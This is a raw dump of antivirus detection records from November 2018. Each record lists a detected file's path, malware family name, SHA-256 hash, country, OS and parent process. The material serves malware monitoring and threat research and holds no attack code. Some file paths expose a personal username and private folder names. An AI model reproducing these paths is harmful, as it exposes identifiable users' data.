  Row(detection=Row(filename='tmp001f8ac3', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8ac3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T19:02:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d8a145ffb2b49fbd12f994726772bee6543d5cd51195e2abc12c3f6e8c71c1db', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D8A145FFB2B49FBD12F994726772BEE6543D5CD51195E2ABC12C3F6E8C71C1DB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d8a145ffb2b49fbd12f994726772bee6543d5cd51195e2abc12c3f6e8c71c1db', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:56:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered cemec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cemec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='0268017b9975cb13801f4f2b1abf5421e24188536126b282a96411a6f92f02ae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:02:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:46:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='78359a1b4529c319b2cae7e8feb461ae.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_795866800\\78359a1b4529c319b2cae7e8feb461ae.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='174cff58c154169683aa86b66b2118b6f6d879af8dee8dcd4a4d153e2bebb416', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T22:35:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174449-68abd0d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2dc94d8b\\AVSCAN-20181104-174347-60C3EB91\\AVSCAN-20181104-174449-68ABD0D0', filesize=896000, name='Adware/CrossRider.mrhba.#M1.#R1'), hash='b725dfdb3755335affe6ea33419d5c08308b81a1d82818623958e961c3de1254', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T16:44:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:22:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T00:49:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:50:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='toolregistrysearch.exe', filepath='C:\\Program Files (x86)\\WinUtilities\\ToolRegistrySearch.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='8489184fb747ef927b1e1f587a634b75a3d3c4e51cce1db6dc16897205bec744', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\3582-490\\\\\\\\DfsdkS.exe\\\\\\" ', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-04T16:15:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:16:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hercules.exe', filepath='F:\\العاب 2014\\العاب جديدة\\هركليز\\HERCULES.EXE', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b9fe75830dd5a47a413c1c4d1bab02c221f01cd01bd2a2a88e3b0cc99de5b21e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:21:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194618-4ef15205', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77abea06\\AVSCAN-20181104-194023-17C93266\\AVSCAN-20181104-194618-4EF15205', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:46:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-004643-f0cd48a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0b249a1\\AVSCAN-20181104-003913-AF95EBA0\\AVSCAN-20181104-004643-F0CD48A6', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T12:44:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-04T19:43:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111507-30752239', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9c11e59\\AVSCAN-20181104-110723-F3656EEC\\AVSCAN-20181104-111507-30752239', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:45:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T16:32:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2f905561d55006181754e72a857b1115', filepath='c:\\$recycle.bin\\s-1-5-21-1065681938-136227472-3706928249-1000\\$r23ahc8\\2f905561d55006181754e72a857b1115', filesize=2732000, name='ADWARE/PullUpdate.Gen7.#M2.#R601522'), hash='feebc2d9ff10276d627a31fa28aab9f37a932d0de6a22bac2f3920db8df8550c', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:44:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mypublicwifi.exe', filepath='\\\\?\\D:\\hakimdede-vpn\\MyPublicWiFi.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='c6f4691a6533a22b437a3cee2624ff9e6428d9d838579da786a573f7db17184b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:08:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230135-25dc8ed0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_351d6c58\\AVSCAN-20181102-225811-0BC5FC09\\AVSCAN-20181102-230135-25DC8ED0', filesize=1024000, name='ADWARE/CrossRider.Gen4.#M1.#R1'), hash='f880f56b1b3719e2586b1769b257af548d1c25a7fbfded924d1791543fee1081', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:01:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lostfile_jpg_320321136.jpg', filepath='J:\\abdurrahman dai kurtarma\\F\\Lost File Results\\LostFile_JPG_320321136.jpg', filesize=20000, name='DR/FakePic.Gen.#M1.#R1'), hash='e4d2c1791fd26ad14c122fe06186c729fbffa96dcb06a4fc67ccf867de1b88bd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET NOD32 Antivirus\\x86\\ekrn.exe', parentsize=1353720, timestamp='2018-11-02T19:02:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013159-b153ecc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2084602e\\AVSCAN-20181102-013142-ADB29A30\\AVSCAN-20181102-013159-B153ECC0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081422-344de6ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081422-344DE6EF', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170319-86530a9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a2111aa3\\AVSCAN-20181102-170000-5EF19B4D\\AVSCAN-20181102-170319-86530A9B', filesize=576000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='c2bb8e1e66d4901333bc0c86223a27af63f4a88de9ca06dc67ef01de9c56ae72', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hsgcodkq.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\hsgCODkq.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:08:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:23:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ppc386.exe', filepath='C:\\FPC\\2.6.0\\bin\\I386-WIN32\\ppc386.exe', filesize=2112000, name='W32/Sality.AT.#M1.#R1'), hash='cd4149e978e5eab07a52d84cba0bdb2b7f67f56a3b3c50b6f4196a8cebdd4365', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-02T03:07:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192701-ade0a9fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-192341-9A7DD6A8\\AVSCAN-20181102-192701-ADE0A9FE', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082701-1d8e422d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-082701-1D8E422D', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='da343c443d011a73dc594be01e6d555d8fde1fd2eadfba27a47855aa339522d9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:28:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstaller.exe', filepath='C:\\Program Files\\ZL7U3ZEBSE\\uninstaller.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R4133'), hash='f815b8a789320a6d4d1510b5ce36e3af075fd66c729ef1d1666990ee9b5aed98', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:eB\\\\\\/j1+hXoE+1Ym1b.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:57:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='689342.exe', filepath='D:\\689342.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R4205'), hash='ed139557bf929c41df2cdcbf76798223f60d07b15816ab7cada3787008faf3cc', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T17:38:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\4vag3ihey2c\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/increment', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\aitagent.exe', parentsize=None, timestamp='2018-11-02T12:07:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104835-be33f3cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_786e2ca0\\AVSCAN-20181102-104825-BBD2B5F3\\AVSCAN-20181102-104835-BE33F3CC', filesize=72000, name='HEUR/AGEN.1028380.#M1.#R1'), hash='ba6a1a62b220087586c43ca7676d41ecc0fed317ce78090dd0bdb712c014009b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:48:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMMON\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='928ff71a795c02629c8ae50f06db366f3c19969ff50708ea4316dd1ec29c00cc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1ge4yuihrya\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091442-4c1b8cb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_271abb63\\AVSCAN-20181102-091202-35CAD49D\\AVSCAN-20181102-091442-4C1B8CB6', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:14:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='psd file.exe', filepath='F:\\psd file\\psd file.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:37:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-213232-e288f80b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3d99b5b\\AVSCAN-20181101-212045-84210F61\\AVSCAN-20181101-213232-E288F80B', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\windows\\syswow64\\config\\manual\\1\\2\\3\\1\\1\\1\\1\\1\\1\\2\\3\\1\\1\\1\\tib\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='9d4f0082ca27b8ec25f8b7ba843e8ee360efab2c8fcdf00066e6700bdfcbc75e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T10:50:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsg1B1F.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-02T10:58:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vlc-cache-gen.exe', filepath='G:\\Program Files\\VideoLAN\\VLC\\vlc-cache-gen.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='baac55fcb13281574d20d1b22b5f1ef79499af5e6f25cdfa6d23a11ef04c0e3f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Comodo\\COMODO Internet Security\\cmdagent.exe', parentsize=8683840, timestamp='2018-11-02T23:21:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102014-a0c3cf15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102014-A0C3CF15', filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='\\\\?\\C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='116845a2-c2bc-ed08-3b0a-dd876dd17a31.exe', filepath='F:\\{41fbdc74-3d0f-c7bc-352b-3b35d1825a35}\\116845a2-c2bc-ed08-3b0a-dd876dd17a31.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='b9aa769660dea8fe55fb82e7fbdb92ad424e01ab4f8865266122e70fd0418051', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2380944, timestamp='2018-11-04T08:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c164', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c164', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:28:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c756', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c756', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:34:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-212239-f7c6f647', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0678b562\\AVSCAN-20181103-203524-E56FFA60\\AVSCAN-20181103-212239-F7C6F647', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:22:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296eb1', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296eb1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:36:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238706', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238706', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:24:38Z'), dt=datetime.date(2018, 11, 4)),
